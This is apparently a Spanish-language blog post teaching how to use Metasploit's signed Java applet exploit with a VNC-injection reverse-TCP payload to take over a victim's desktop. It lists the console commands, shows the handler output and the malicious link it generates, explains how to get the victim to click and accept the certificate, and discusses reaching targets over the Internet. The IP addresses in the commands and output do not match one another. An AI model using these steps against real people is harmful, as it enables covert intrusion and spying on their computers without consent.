En esta ocasion, se mostrara como de manera facil y usando el Metasploit Framework inyectaremos un servidor VNC en una maquina remota para poder visualizar el escritorio de la victima y hacer lo que deseemos.
Antes de entrar en materia debemos tener en cuenta que el exito del exploit depende de varios factores entre ellos tenemos:
- Antivirus de la maquina victima -> He hecho algunas pruebas y el NOD32 detecta el archivo como un troyano.
- JAVA -> Es necesario que la victima tenga instalado JAVA instalado
- Que la victima acepte el certificado.
- Un poco de suerte.
Para empezar debemos actualizar nuestro Metasploit:
msfupdate
El siguiente paso es correr la consola del metasploit:
msfconsole
Ahora seleccionamos el exploit y asignamos los parametros necesarios:
use exploit/multi/browser/java_signed_applet set payload windows/vncinject/reverse_tcp set lhost 192.168.100.1 -> Ip local lhost => 192.168.1.100 exploit
A continuacion debe salir algo como esto:
[*] Exploit running as background job. [*] Started reverse handler on 192.168.1.2:4444 [*] Using URL: http://0.0.0.0:8080/dTkaem [*] Local IP: http://192.168.1.100:8080/dTkaem [*] Server started.
El siguiente paso es hacer que nuestra victima haga click en el enlace malioso que el exploit a creado:
Hay que tener en cuenta que esta es una direccion privada y que asi solo funcionara si nuestra victima esta en la misma red LAN. Si se desea hacer a traves de Internet se debe cambiar el enlace por la IP publica y asegurarse que no haya algun dispositivo como router, firewall o demas que impidan el paso hacia el puerto 8080
Cuando la Victima haga click en el enlace aparecera una advertencia como esta:
Si nuestra victima ejecuta la aplicacion, inmediatamente se nos abrira la pantalla del escritorio remoto donde podremos ver lo que hace la victima en ese momento, y hacer lo que nosotros queramos.
buen post!
es sergioyoshiman@hotmail.com